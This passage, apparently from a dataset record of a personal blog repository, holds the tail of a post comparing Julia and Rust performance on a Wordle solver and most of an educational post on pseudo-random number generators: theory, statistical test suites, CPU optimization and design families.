Rust][rsimpl].\n\n $ time cargo run\n Ranking guesses... 
11/12972 words (441 min left)\n\nAnd just like that, I was granted the best Wordle guess in 7h,\n15% of the time that parallelizing Julia would have given me.\n\n*(Edit: using `time cargo run --release`\neven brings it all the way down to 30 minutes!)*\n\n*(Edit 2: [a Julia thread investigated the code][jlthread].\nA big part of the time difference came from a mistake in the Julia code,\nwhich caused the algorithm to search through all possible guesses\nas potential solutions, instead of only the accepted solutions.\nThat brings it down to about 4h on the same machine.*\n\n*The other improvements which allow Julia to match Rust performance involve\nusing byte arrays instead of strings,\nusing integer types with a fixed number of bits,\nand avoiding non-constant globals.*\n\n*Along with [a few other fascinating tricks][jlpr] that I recommend you read,\n**the Julia version takes a stunning 22 minutes**,\nbetter than the simple Rust version (which, to be fair,\ncan likely achieve it too with similar tricks.))*\n\n## A warning on what the moral is\n\nSure, the main conclusion is this:\n\n> Sometimes, rewriting in a more suitable language will get you the answer\n> faster than any time spent on optimization or parallelization can give you.\n\n*(Edit: and, as someone from the Julia thread puts it,\nsometimes you might not make the same bug in both implementations!)*\n\nHad I rewritten the code directly\ninstead of spending two hours vainly optimizing Julia code,\nI would have got the answer two hours earlier.\n\nBut more importantly, this is not about the language itself.\nIt is about the quality of the compiler’s optimizers.\nRewriting it in JS would have given a similar speedup.\n\nJulia has outstanding qualities, and it can be fast.\nIt just has not had the sheer magnitude of optimizational grind\nthat V8 and Rust have accumulated over the years.\n\nAnd in case you were hoping to know why I called this algorithm suboptimal:\nconsider that a first guess could leave only 5 possible solutions\nwhich all next guesses would narrow down to 2;\nwhilst a better first guess could leave 6 possible solutions\nwhich the next guesses narrow down to 1.\n\n[Algorithms do matter in the end too.][optimal-blog]\n\n—\n\n[Reddit comments here.](https://www.reddit.com/r/programming/comments/se16m0/sometimes_rewriting_in_another_language_works/)\n[HN comments here.](https://news.ycombinator.com/item?id=30101862)\n[Other comments here.](https://www.reddit.com/r/espadrine/comments/se187i/sometimes_rewriting_in_another_language_works/)\n\n[Wordle]: https://www.powerlanguage.co.uk/wordle/\n[blog1]: https://typon.github.io/wordle.html\n[blog2]: https://slc.is/#Best%20Wordle%20Strategy%20%E2%80%94%20Explore%20or%20Exploit\n[blog3]: https://bert.org/2021/11/24/the-best-starting-word-in-wordle/\n[blog4]: https://github.com/jakearchibald/wordle-analyzer/\n[jlimpl]: https://github.com/espadrine/optimal-wordle/blob/2e71cb4ca461ded5111a001ceb398ec2f4b08494/play-optimally.jl\n[Julia]: https://julialang.org/\n[jlperf]: https://julialang.org/benchmarks/\n[rsimpl]: https://github.com/espadrine/optimal-wordle/blob/934dffd9781b6067b6de7b0f136a519867570fa3/src/main.rs\n[optimal-blog]: https://sonorouschocolate.com/notes/index.php?title=The_best_strategies_for_Wordle\n[jlthread]: https://discourse.julialang.org/t/rust-julia-comparison-post/75403/16?u=kristoffer.carlsson\n[jlpr]: https://github.com/espadrine/optimal-wordle/pull/1\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": 
\"BlogPosting\",\n \"datePublished\": \"2022-01-27T16:36:40Z\",\n \"keywords\": \"julia, rust, optimization\" }\n</script>\n"
},
{
"alpha_fraction": 0.7627834677696228,
"alphanum_fraction": 0.7747005820274353,
"avg_line_length": 61.89483642578125,
"blob_id": "9ee9c0eac657da4c4f23ea7cfd4c71c20179e93b",
"content_id": "6e3036b88e472fafa5b75bde52106fa733762dad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 33162,
"license_type": "no_license",
"max_line_length": 765,
"num_lines": 523,
"path": "/blog/src/a-primer-on-randomness.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# A Primer On Randomness\n\nLast October, during a one-week hiking holiday in the birthplace of alpinism,\nI got particularly interested in random generators.\n\nFour reasons why they are fascinating:\n\n1. It is only once you track it that you realize just in which gargatuan proportions you **exude information**. Even tiny systems that encode very little data and whose entire purpose is to never leak it (ie, random generators), do so in ways that can be measured, and even exploited. In every instant of your life, during every interaction with someone, billions of muscle movements, tiny and large, only occur because of past events burnt into your brain’s circuits, and betray this private history. Given enough of it, an aggregator could rewind the world and extract minute details from the past.\n2. All of **symmetric cryptography** completely hinges on randomness. Security proofs fully rely on the analysis of how little information you can extract from a stream, which requires the stream to effectively look random.\n3. Studying them, and trying your hand at making them, helps you understand the **scientific method** better. Most real-world principles can never be proved with absolute certainty; you need to accurately detect a signal in the noise, and measure the likelihood that this signal is not just you seeing patterns in the static.\n4. Finally, it helps both understand **the virtue of mixing**, and how best to stir. The effect of mixing is exponential, which is unnatural to mentally harness. On the plus side, when done well, you get fluid exchange of information, remix, and cultural explosion. On the minus side, you get COVID-19 everywhere. Striking the right balance gets you far: many optimizing algorithms rely on it such as genetic algorithms, stochastic gradient descent, or cross-validation sampling in machine learning, which each are heavy users of pseudo-random sources. The results speak for themselves: AlphaGo, for instance, beat the best human player at one of the hardest games on Earth, using Monte-Carlo Tree Search. Yes, you guessed it, they call it Monte Carlo for a reason.\n\n## Information Theory\n\nA good Pseudo-Random Number Generator (or PRNG for short) is indistinguishable from a true random output.\n\n*So, where do we get this true random output you speak of?*\n\nTrue randomness has statistical meaning, but it is impossible to prove or disprove.\nYou can only have a high confidence.\n\nYou might hope that true randomness can be extracted from nature, but that is also not true.\nThe physical realm contains a large quantity of data storage (“space”),\nand laws that alter it: gravity, electromagnetism, …\nNature is a state transition function and an output; that is also the structure of a PRNG.\n\nPhysical processes that claim to output “true” randomness rely on the large amount of information stored in the environment, and that environment’s diffuse state scrambling, that is presumably extremely hard for an attacker to detect.\n\nFor instance, the fine trajectory of electrons attracted from atom to atom through an electrical circuit causing minuscule delays, or the chaotic motion of gaseous atoms, or stronger yet, quantum behavior of particles. 
\n\nSome physicists may argue that the world is not fully deterministic.\nHowever, the Copenhagen Interpretation or Multiverse fans\ncannot disprove the possibility of a non-local world that complies with the Bell-EPR paradox,\nfor instance through superdeterminism or pilot waves.\n(Sorry for those that don’t care about quantum mechanics;\nyou don’t need to understand this paragraph to carry on.)\n\nSince true randomness is not real, how do we get close?\n\nLet’s say that you generate bits. If all the bits were `1`, it would be pretty predictable, right?\nSo the frequency of ones should converge to one out of two, which is what probability half is.\n\nBut if the output was a one followed by a zero continuously (`101010…`), it would be predictable too!\nSo the frequency of the sequence `10` in the output should converge to one out of four.\n\nMore generally, every possible sequence of `n` bits should appear with a frequency converging to `1÷2ⁿ`.\n\n(A common romanticization of that idea is the comment that the decimals of π encode the entire works of Shakespeare.\nπ being irrational, its formulation is [orthogonal to any fractional representation][Weyl], which is what decimals are.\nThat gives strong credence to the conjecture that its digits form a truly random sequence.)\n\nThat idea might make you uneasy. After all, it gives an impossible requirement on the memory size of a generator.\n\n### Memory\n\nIf your state contains `i` bits, what is the largest sequence of consecutive ones it can output?\n\nWell, since the PRNG is deterministic, a given state will always yield the same output.\nThere are `2ⁱ` possible state configurations, so with this entropy, you can at best output `i·2ⁱ` bits\nbefore you arrive at a previous state and start repeating the same output sequence again and again.\n\nAt least, with an ideal PRNG, you know that one given configuration will output a sequence of `i` ones.\nThe previous configuration (which transitioned to the configuration that outputs the `i` ones)\ncannot also output a sequence of `i` ones:\nif two configurations yielded the same output, then there would be some `i`-bit output that no configuration produced.\nThat would not be an ideal PRNG.\n\nSo let’s say that the previous configuration gives `i-1` ones (a zero followed by a ton of ones),\nand that the next configuration gives `i-1` ones (a ton of ones followed by a zero).\nThat is a total of a maximum of `3×i-2` consecutive ones.\n\nThus, you cannot get `3×i-1` consecutive ones…\nwhich a true random generator would output with a frequency of `1 ÷ 2^(3×i-1)`.\nA statistical deviation that you can detect to disprove that a generator is truly random!\n\nConversely, it means that *true generators require infinite memory*, which is impossible in the real world.\n\n(By the way, yes, it does seem like computing all the digits of π requires infinite memory.\nAll current algorithms need more memory the more digits are output.)\n\nIn practice, you get around the issue by picking a state size `i` large enough that\ndetecting this statistical anomaly requires millennia’s worth of random output, too much for anyone to compute.\n\n### Cycle Analysis\n\nSo, once we have picked a state size, we have an upper bound for the period of the PRNG:\nit will repeat the same sequence at least every `2ⁱ` bits.\n\nBut of course, your mileage may vary. 
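For toy state sizes, you can measure the actual period directly; a brute-force sketch:\n\n```\ndef cycle_length(step, seed):\n    # Walk the state sequence until a state repeats;\n    # return the length of the cycle that the seed falls into.\n    seen = {}\n    state, i = seed, 0\n    while state not in seen:\n        seen[state] = i\n        state = step(state)\n        i += 1\n    return i - seen[state]\n\ndef toy_step(s):\n    # A 16-bit scrambling transition, for illustration only.\n    s ^= (s << 7) & 0xFFFF\n    s ^= s >> 9\n    s ^= (s << 8) & 0xFFFF\n    return s\n\nprint(cycle_length(toy_step, 1))\n```\n\n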
An imperfect generator might have a much lower period.\nUnless you have a mathematical proof for a **lower bound**, maybe your family of generators\nhas a seed (an initialization parameter) which results in the same output being repeated over and over…\nThat is called a fixed point.\n\nEven if there is no fixed point, there could be a large number of seeds that start repeating soon!\n(That was a real [vulnerability in the RC4 cipher][], by the way.)\n\n[vulnerability in the RC4 cipher]: https://www.cs.cornell.edu/people/egs/615/rc4_ksaproc.pdf\n\nOn the plus side, there is a counterintuitive phenomenon that develops\nwhen a set of links randomly connect with each other in closed chains.\nMost links end up on long chains.\nFor instance, with two links, they will be connected in a chain half the time;\nwith three links, each link will be connected to another link with probability ⅔; etc.\n\nBetter yet, if you increase the number of links linearly,\nyou decrease the proportion of links that are part of small chains exponentially.\n\nThe bottom line is this: you can always put lipstick on the pig by increasing the state size,\nand your generator will look good.\n\nHowever, a fundamentally better generator would have become even better yet with an increased state size.\n\n### Reversibility\n\nIf you build out the design at random, a danger lingers.\nUnless you are careful, you might build an irreversible generator.\nGiven a state after a generation,\ncan you mathematically compute the previous state?\n\nIf you can’t,\nthen there are multiple initial states that can transition to the current state.\nThat means some states can never happen,\nbecause there is no initial state that transitions to them;\nthey got stolen by the states with multiple previous states pointing to them!\n\nThat is bad. Why?\n\nFirst, it reduces the potency of your state size\n(since a percentage of possible states are unreachable).\n\nSecond, many seeds merge into the rail tracks of other seeds,\nconverging to a reduced set of possible streams and outputting the same values!\nNot only does this create inter-seed output correlation,\nit also means that *a given stream will likely degrade in period*.\n\n<p><img alt='Irreversible PRNG example.' src='../assets/a-primer-on-randomness/irreversible-prng.svg' width=350>\n\nIt could look good for many terabytes, and suddenly reach a fixed point,\nand output the same number over and over.\n\nIn fact, if the states transition to randomly picked states,\nthe average cycle that you eventually get to\n[loops every 2<sup>(n+1)÷2</sup>][Bob Jenkins talk].\n\n[Bob Jenkins talk]: https://burtleburtle.net/bob/rand/talksmall.html\n\nIf you build a **reversible** algorithm,\nat least all streams are a cycle,\nso inter-seed correlation is not inevitable.\n\nSome streams can have really long cycles.\nBecause they include a lot of states,\na starting seed is more likely to land in a long-cycle state.\nThe average period becomes 2<sup>n-2</sup>, almost the square of the irreversible case’s 2<sup>(n+1)÷2</sup>.\n\n<p><img alt='Reversible PRNG example.' src='../assets/a-primer-on-randomness/reversible-prng.svg' width=350>\n\nNote that a reversible design does not mean that the state cycles through all possible combinations.\nIt just means that each state points to exactly one other state, and has exactly one state leading to it.\nIn other words, it is a *bijection*, but not a *circular permutation*.\n\n<p><img alt='Circular permutation example.' 
src='../assets/a-primer-on-randomness/circular-prng.svg' width=350>\n\n### Diffusion\n\nClaude Shannon made [a very good point the other day][Sha45] (I think it was in 1945?) about ciphers.\nAn ideal pseudo-random source is such that any bit of the input flips half the bits of the output.\n\nMore precisely, ideally, the probability that any bit of the stream flips when a given bit of the state flips should be ½.\nThat is called **diffusion** of the state.\n\nAfter all, if it wasn’t ½, I could start making good guesses about whether this bit of the state is set,\nand slowly recover pieces of the state or even the key.\nAnd suddenly, I can predict the whole stream.\n\nA related concept is **confusion** of the key.\nIdeally, each bit of the output depends equally on a combination of all bits of the key.\nSo, each bit of the key should change each bit of the stream,\nfor half of the set of possible configurations of the key’s other bits.\n\nEach bit of the stream should therefore be a complex combination of all of the key’s bits,\nwhile each bit of the key should have an impact stretched along the whole stream.\n\nThese properties particularly matter for cryptographic primitives such as ChaCha20,\nwhere the seed of the PRNG is essentially the cipher key.\nTheir analysis and understanding still matter for PRNG quality;\nalthough some designs don’t take confusion seriously,\nleading to severe correlation of distinct seeds.\n\n[Weyl]: https://mathworld.wolfram.com/WeylsCriterion.html\n[Sha45]: https://www.iacr.org/museum/shannon/shannon45.pdf\n\n## Tooling\n\nBack in the seventies, there was no tooling to pragmatically study the quality of a generator.\nThat made the PRNG hobby somewhat impractical.\n\nAs a sad result, some people produced subpar results, such as IBM’s infamous [RANDU]:\n\n> It fails the spectral test badly for dimensions greater than 2, and every integer result is odd.\n\nFortunately, great strides have been made since.\nAnyone can get going quickly, up until they start having competitive results.\n\n[RANDU]: https://en.wikipedia.org/wiki/RANDU\n\n### History\n\nA first step was Donald Knuth’s description of the use of **Chi-Squared tests** in 1969.\n\nWhile its application to generators was described in Knuth’s seminal work\n*The Art of Computer Programming*, we have to thank Karl Pearson for the concept.\n\nAs the story goes, Pearson was disgruntled at scientists estimating all their results\nbased on the assumption that their statistical distributions were always normal,\nwhen in some cases they very clearly were not. They just didn’t really have any other tool.\n\nSo he worked through the theory. Say you make a claim that some value, for which you have samples,\nfollows a given statistical distribution. (A uniform one perhaps? 
Like our PRNG outputs?)\nCall that “**the Null Hypothesis**”, because it sounds cool.\n\nYour evidence is a set of samples that belong in various categories.\nYour null hypothesis is the belief that each category `i ∈ {1,…,k}` appears with probability `pᵢ`.\nMaybe the two classes are 0 and 1; maybe they are the 256 possible bytes.\n\nThere are `oᵢ` *observed* samples in category `i`.\nThe theoretical, *expected* number of samples should be `eᵢ` = `n·pᵢ`.\nYou compute the **Chi-Squared statistic**: `χ²` = `Σ (eᵢ - oᵢ)² ÷ eᵢ`.\n\nThat statistic follows a distribution of probabilities,\ndepending on the degrees of freedom of the problem at hand.\nIf we are looking at random bytes, each generation must be one of 256 possible outputs:\nso there are 255 degrees of freedom.\n(If it is not in the first 255, it must be in the last, so the last one is not a degree of freedom.)\n\n\n\nEach possible value of `χ²` you get has a probability of being valid for your null hypothesis.\nOne value is the most probable one. The further you get from it, the least likely it is that your samples are random.\n\nBut by how much?\n\nYou want to know the probability that a true random generator’s `χ²` lands\nas far from the ideal value as your pseudo-random generator did.\n(After all, even a perfect generator rarely precisely lands on the most probable `χ²`,\nwhich for random bytes is 253 with probability 1.8%.)\n\nYou can compute the probability that a true random generator’s `χ²` is bigger (more extreme) than yours.\nThat probability is called a **p-value**.\nIf it is tiny, then it is improbable that a true random generator would get this value;\nand so, it is improbable that what you have is one.\n\n\n\nWith this tool in hand, you can easily check that a process that pretends to be random is not actually so.\n\nOr, as [Pearson puts it][Pearson]:\n\n> From this it will be more than ever evident how little chance had to do\n> with the results of the Monte Carlo roulette in July 1892.\n\n(Not sure why his academic paper suddenly becomes so specific;\nmaybe he had a gambling problem on top of being a well-known racist.)\n\nFun sidenote: if you look at the `χ²` formula, notice that if your observed values all hit their expectations,\nyou will always end up with a `χ²` equal to zero, whose p-value is 1.\n\nUniform random numbers have this awesome property that their p-values should also be uniformly random,\nand the p-values of the p-values too, and so on.\n\nThe p-value you want is simply one that is not too extreme (eg, higher than 10¯⁵, lower than 1-10¯⁵).\nA p-value of 1 immediately disqualifies your null hypothesis!\nPerfect fits are not random; you must have anomalies some of the time.\n\nLet’s get back to Donald Knuth. His advice of using this tool to study pseudo-random efforts defined all subsequent work.\n\nIn 1996, another PRNG fellow, George Marsaglia, looked at the state of tooling with discontent.\nSure, those Chi-Squared tests were neat.\nBut writing them by hand was tedious.\n\nWorse, nothing defined what to observe. Bytes are one thing, but they only detect byte-wise bias.\nWhat about bitwise? 
What if we count bits, and compare that count to a *Known Statistic* (**bit counting**)?\nWhat if we count the number of successive times one byte is bigger than the one generated just before (**runs test**)?\nOr maybe count the number of outputs between the appearance of the same value (**gap test**)?\nOr take a random matrix, compute its rank, verify that it validates the *Known Statistic* (**binary rank**)?\n\nWell, he didn’t think about all those tests,\nbut he did publish a software package that automatically computed p-values\nfor a dozen of tests. He called it *DIEHARD*.\n\nSome are like the ones I described, some are a bit wilder and somewhat redundant,\nsome have a bit too many false positives to be relied upon.\n\nBut it was the start of automation!\n\nAnd the start of the systematic extermination of the weak generators.\n\nIn 2003, Robert G. Brown extended it with an easy-to-use command-line interface, *[Dieharder]*,\nthat allowed testing without having to fiddle with compilation options, just by piping data to a program.\nHe aggregated a few tests from elsewhere, such as the NIST’s STS\n(which are surprisingly weak for their cryptographic purpose… Those were simpler times.)\n\nA big jump in quality came about in 2007.\nPierre L’Écuyer & Richard Simard published *[TestU01]*, a test suite consisting of three bars to clear.\n\n- SmallCrush picks 10 smart tests that killed a number of weak generators in 30 seconds.\n- Crush was a very intensive set of 96 tests that killed even more weaklings, but it took 1h to do so.\n- BigCrush was the real monster. In 8 hours, its set of 106 tests brutalizes 8 TB of output, betraying subtler biases never before uncovered, even in many previously-beloved PRNGs, such as the still-popular Mersenne Twister. A very sobering moment.\n\nTestU01 installed two fresh ideas: having multiple levels of intensity, and parameterizing each test.\nThe latter in particular really helped to weed out bad generators.\nMaybe if you look at all the bits, they look fine, but if you look at every eigth bit, maybe not so much?\n\nThe feel of using the programs was still similar, though: you ran the battery of tests,\nyou waited eight hours, and at the end, you were shown the list of all tests whose p-value was too extreme.\n\nThence came the current nec-plus-ultra: Chris Doty-Humphrey’s *Practically Random*,\naffectionately called [PractRand], published in 2010.\n\nIt was a step up still from TestU01:\n\n- Instead of eating one output for one test and throwing it away, it uses output for multiple tests, and even overlaps the same test families along the stream, maximizing the extraction of statistics from each bit of output.\n- It took the concept of levels of intensity to a new level. The program technically never stops; it continuously eats more random data until it finds an unforgivable p-value. On paper, it is guaranteed to find one, at least once it reaches the PRNG’s cycle length; but that assumes you have enough memory for it to store its statistics. In practice, you can go very far: for instance, the author’s own sfc16 design reached flaws after 512 TiB — which took FOUR MONTHS to reach!\n- It displays results exponentially. 
For instance, once at 1 MB of random data read, then at 2, then at 4, then at 8, … Every time, it either tells you that there are no anomalies, or gives the list of tests with their bad p-values.\n\n*(A small note: don’t expect this tooling to be satisfactory for anything cryptographic.\nTheir study relies on much more advanced tooling and analysis pertaining to diffusion,\ndifferential cryptanalysis, algebraic and integral attacks.)*\n\nI am a big believer in tooling.\nI believe it is THE great accelerator of civilization.\nThe step that makes us go from running at 30 km/h, to speeding at 130 km/h, to rocketing at 30 Mm/h.\nIn fact, by the end of this series of posts, I hope to publish one more tool to add to the belt.\n\n[Pearson]: http://www.economics.soton.ac.uk/staff/aldrich/1900.pdf\n[ent]: https://www.fourmilab.ch/random/\n[Dieharder]: https://webhome.phy.duke.edu/~rgb/General/dieharder.php\n[TestU01]: http://simul.iro.umontreal.ca/testu01/tu01.html\n[PractRand]: http://pracrand.sourceforge.net/\n\n### Hands-On\n\nI don’t actually recommend you start out with PractRand for the following reasons:\n\n- You might make silly mistakes. PractRand can kill generators that looked OK in the 80s fairly instantly. You won’t know if your design didn’t even stand a chance back then, or if it was competitive.\n- You might have a coding bug. It would be too bad if you threw away a good starting design just because a mask had the wrong bit flipped.\n- Seeing Chi-Square failures helps understand the beginner design space. Yes, you want the output to have high entropy; but while it is obvious that you don’t want a poorly balanced output (eg. one possible sequence appears too often), you also don’t want a highly structured output (eg. all possible sequences appear exactly as often), since random noise must contain anomalies. Seeing a high-entropy generator fail because bytes were slightly too equiprobable helped me appreciate what was undesirable. It is often counter-intuitive, so these beginner lessons help a lot.\n\nI would encourage you to build a silly idea, then pipe 10 MB to [ent].\nCheck the entropy calculation (it should be somewhere around 7.9999),\nand verify that the Chi-Square p-value is between 0.1% and 99.9% with a set of seeds.\n\nCompare it to a good randomness source: `</dev/urandom head -c 10M | ent`.\n(When I say good, I mean ChaCha20, which is what Linux uses.)\n\nSee what happens when you go from 10M to 100M: does the p-value always decrease, or always increase?\nThat would be bad, very bad indeed.\n\nOnce your Chi-Squared is good, skip all the old tests, and hop into PractRand: `./prng | RNG_test stdin64`.\nI recommend specifying the size of your output, so that PractRand can know what to look out for.\n\nThen comes the contest.\n\nIf you pass 1 MiB: you have beaten the sadly very widely-used [drand48]! (Java, C, …)\n\nIf you pass 256 GiB: you are now better than the widely-used [Mersenne Twister]! (Ruby, Python, …)\n\nIf you pass 1 TiB: congratulations, you beat the famous [RC4] stream cipher!\n(Used as macOS’s old arc4random source, and actually most websites used it for TLS at some point…)\n\nIf you pass 32 TiB: you have won. 
The `RNG_test` program automatically stops.\nBeware: it takes about a week to compute… when your generator is fast.\n\nQuick advice: remember that p-values should be uniformly random.\nIt is inevitable to have some of them be labeled “unusual”, or even, more rarely, “suspicious”.\nIt does not mean you failed.\n\nWhen the p-value is too extreme, PractRand will show “FAIL!” with a number of exclamation marks proportional to how horrified it is.\nThen, the program will stop immediately.\n\nSome tests will fail progressively.\nIf the same test shows “unusual” at 4 GiB, and “suspicious” at 8 GiB,\nit will probably fail at 16 GiB.\n\n### Speed\n\nOnce you beat 32 TiB of PractRand, you know your generator is good —\nbut to be useful, it also must be the fastest in its class.\n\nA few notes can really help you get it up to speed.\n\nFirst, pick your target platform.\n\nYou will need different optimization tricks if you build for `x86_64`\n(Intel / AMD), or for ARM (phones),\nor if you directly target a CMOS integrated circuit,\nif you want to burn your PRNG in an ASIC.\n\nLet’s say you want to get the most out of your Intel or AMD chip.\nGo as close to the metal as you can. Code in C, C++, or Rust.\n\nSecond, understand the assembly output. Looking at the compiled assembly with `gcc prng.c -S -o prng.asm` can help.\nI recommend [Intel’s introduction], [AMD’s manual] and [Agner’s instruction tables].\n\nIn particular, a number of amd64 opcodes are inaccessible from the programming language.\nYou can access them in various ways:\n\n- The compiler will smartly use them when they apply. For instance, there is an opcode to rotate the bits of a variable leftward: `ROL`. But all the C programming language offers is shift (`>>` for `SHR`, `<<` for `SHL`). However, the compiler will map `(a << 1) | (a >> 63)` to the 64-bit `ROL`.\n- Compilers usually include header files or libraries to access those instructions, by exporting functions that compile down to the corresponding instruction. Those are called **[intrinsics]**. For instance, our friend the 64-bit `ROL` appears as `_rotl64(a, 1)`, if you `#include <immintrin.h>`.\n- SIMD operations heavily depend on your mastery of the compiler. You can either access them through assembly, compiler flags, or intrinsics (my favorite).\n\nThird, understand the way [the CPU processes the assembly][AgnerMicroarchitecture].\n\n- **[Instruction pipelining]**: Every instruction executed goes through a number of phases: \n ① the instruction is decoded from memory and cut in micro-operations (μops); \n ② each μop is assigned internal input and output registers; \n ③ the μop reads input registers; \n ④ it is executed; \n ⑤ it writes to the output register; and finally \n ⑥ the output register is written to the target register or memory. \n Each of those stages start processing the next instruction as soon as they are done with the previous one, without waiting for the previous instruction to have cleared all steps. As a result, a good number of instructions are being processed at the same time, each being in a different stage of processing. \n *Example gain: successive instructions go faster if each stage of the second one does not depend on the first one’s later stages.*\n- **Superscalar execution**: Each μop can be executed by one of multiple execution units; two μops can be executed by two execution units in parallel as long as they don’t have inter-dependencies. 
Third, understand the way [the CPU processes the assembly][AgnerMicroarchitecture].\n\n- **[Instruction pipelining]**: Every instruction executed goes through a number of phases: \n ① the instruction is decoded from memory and cut into micro-operations (μops); \n ② each μop is assigned internal input and output registers; \n ③ the μop reads input registers; \n ④ it is executed; \n ⑤ it writes to the output register; and finally \n ⑥ the output register is written to the target register or memory. \n Each of those stages starts processing the next instruction as soon as it is done with the previous one, without waiting for the previous instruction to have cleared all steps. As a result, a good number of instructions are being processed at the same time, each being in a different stage of processing. \n *Example gain: successive instructions go faster if each stage of the second one does not depend on the first one’s later stages.*\n- **Superscalar execution**: Each μop can be executed by one of multiple execution units; two μops can be executed by two execution units in parallel as long as they don’t have inter-dependencies. There might be one execution unit with logic, arithmetic, float division, and branches; one execution unit with logic, arithmetic, integer and float multiplication; two with memory loads; one with memory stores; one with logic, arithmetic, SIMD permutations, and jumps. Each has a different combination of capabilities. \n *Example gain: adding a second instruction doing the same thing, or something belonging to another unit, may not add latency if it acts on independent data.*\n- **Out-of-order execution**: Actually, after the μop is assigned internal registers, it is queued in a ReOrder Buffer (ROB) which can store about a hundred. As soon as a μop’s input registers are ready (typically because of a read/write constraint: another μop wrote the information that this μop needs to read), it gets processed by the first execution unit that can process it and is idle. As a consequence, the CPU can process instructions 2, 3, etc. while instruction 1 waits on a read/write dependency, as long as the next instructions don’t have read/write dependencies with stalled instructions. \n *Example gain: you can put fast instructions after a slow (or stalled) instruction without latency cost, if they don’t depend on the slow instruction’s output.*\n- **Speculative execution**: When there is a branch (eg. an if condition), it would be awful if the whole out-of-order instruction pipeline had to stop until the branch opcode gave its boolean output. So the CPU doesn’t wait to know if the branch is taken: it starts processing the instructions that come after the branch opcode. Once it gets the branch opcode output, it tracks all μops that wrongly executed, and reverts all their work, rewrites the registers, etc.\n- **Branch prediction**: To get the best out of speculative execution, CPUs make guesses as to what the boolean output of a branch is going to be. They start executing the instructions they believe will occur. \n *Example gain: make your branches nearly always take the same path, as in the sketch below. It will minimize branch mispredictions, which avoids all the reverting work.*\n\n
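To make that last point concrete, a sketch (the 128 threshold and the data are arbitrary):\n\n```\n#include <stdint.h>\n\n// Sums the bytes below 128. On uniformly random input, the branch\n// mispredicts about half the time; on sorted input, almost never,\n// and the very same loop runs several times faster.\nuint64_t sum_small(const uint8_t *data, int n) {\n  uint64_t sum = 0;\n  for (int i = 0; i < n; i++) {\n    if (data[i] < 128) sum += data[i];\n  }\n  return sum;\n}\n```\n\n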
Finally, beware of the way you test performance. A few tips:\n\n1. Use the `RDTSC` CPU opcode to count cycles, as below.\n2. Disable CPU frequency variability. CPUs nowadays have things like Turbo Boost that change your frequency based on how hot your processor gets and other factors. You want your CPU to have a fixed frequency for the whole process.\n3. Have as few other processes running as possible. If a process runs in the background, eating CPU, it will affect the results.\n\n```\n#include <stdio.h>\n#include <x86intrin.h>\n\n// Provided by you: must write exactly one gigabyte of generator output.\nvoid generate_one_gigabyte(void);\n\nint main() {\n  __int64_t start = _rdtsc();\n  generate_one_gigabyte();\n  __int64_t cycles = _rdtsc() - start;\n  // 2^30 bytes, so this prints cycles per byte (cpb).\n  fprintf(stderr, \"%f cpb\\n\", ((double)cycles) / 1073741824);\n}\n```\n\n[Intel’s introduction]: https://software.intel.com/en-us/articles/introduction-to-x64-assembly\n[AMD’s manual]: https://www.amd.com/system/files/TechDocs/24592.pdf\n[Agner’s instruction tables]: https://www.agner.org/optimize/instruction_tables.pdf\n[intrinsics]: https://software.intel.com/sites/landingpage/IntrinsicsGuide/\n[AgnerMicroarchitecture]: https://www.agner.org/optimize/microarchitecture.pdf\n[Instruction pipelining]: https://software.intel.com/en-us/blogs/2011/11/22/pipeline-speak-learning-more-about-intel-microarchitecture-codename-sandy-bridge\n\n### Designs\n\nThe earliest design is the **LCG** (Linear Congruential Generator).\nYou can recognize its dirt-simple state transition (a constant addition or multiplication),\nwhich has neat consequences on the analysis of its cycle length (typically 2^statesize).\nUsually, the output is treated with a shift or rotation before delivery.\nWhile they look fairly random, they can have severe issues, such as hyperplane alignment.\nThey also tend to be easy to predict once you reverse-engineer them,\nwhich is why they are not used for anything remotely in need of security.\n\nExamples of LCG abound: [drand48], [Lehmer128], [PCG], …\n\n
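To give a feel for the genre, a sketch (the multiplier and increment are Knuth’s MMIX constants; keeping only the high bits is one common delivery treatment):\n\n```\n#include <stdint.h>\n\nstatic uint64_t state = 1; // the seed\n\nuint64_t lcg_next(void) {\n  state = state * 6364136223846793005ULL + 1442695040888963407ULL;\n  return state >> 33; // the low bits of an LCG are notoriously weak\n}\n```\n\n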
Then come **Shufflers** (eg. [RC4], [ISAAC], [EFIIX]).\nThey usually have an “I” in the name (standing for “indirection”).\nThey try to get randomness by shuffling a list, and they shuffle the list from the randomness they find.\nI do not recommend them. It is so easy for bias to seep through and combine destructively.\nBesides, weeding out bad seeds is often necessary.\n\n**Mixers** rely on a simple transition function,\nusually the addition of what is sometimes called a “gamma” or “[Weyl coefficient][Weyl]”.\nA common non-cryptographic pattern is a state multiplication, just like in LCG,\nand the output is XORed with a shifted or rotated version of itself before delivery.\nThe second step is basically a hash.\n(To the security-minded readers: I am not talking about collision-resistant compression functions.)\nIn cryptography, usually, the mixer uses some ARX combination for bit diffusion (ARX = Add, Rotate, XOR),\nand is scheduled in multiple rounds (which basically amounts to skipping outputs).\nExamples include [wyrand], [SplitMix], [Xorshift128+], [AES-CTR], and the beloved [ChaCha20].\n\nFinally, the most haphazard of them: **chaotic generators**.\nThey typically have no minimal cycle length, and they just try to stir things up in the state.\nFor instance, [jsf] and [Romu].\n\n[Mersenne Twister]: http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/emt.html\n[drand48]: http://man7.org/linux/man-pages/man3/drand48.3.html\n[Lehmer128]: https://lemire.me/blog/2019/03/19/the-fastest-conventional-random-number-generator-that-can-pass-big-crush/\n\n[RC4]: https://cypherpunks.venona.com/archive/1994/09/msg00304.html\n[ISAAC]: http://burtleburtle.net/bob/rand/isaacafa.html\n[EFIIX]: http://pracrand.sourceforge.net/RNG_engines.txt\n[PCG]: https://www.pcg-random.org/\n[SplitMix]: http://gee.cs.oswego.edu/dl/papers/oopsla14.pdf\n[Xorshift128+]: http://vigna.di.unimi.it/ftp/papers/xorshiftplus.pdf\n[AES-CTR]: https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.197.pdf\n[ChaCha20]: https://cr.yp.to/chacha/chacha-20080128.pdf\n[wyrand]: https://github.com/wangyi-fudan/wyhash\n[jsf]: https://burtleburtle.net/bob/rand/smallprng.html\n[Romu]: http://www.romu-random.org/\n\n## Parting Fun Facts\n\nI mentioned ChaCha20 a lot, because it is one of my favorite cryptographic primitives.\nI’ll give you a few fun facts about it, as a 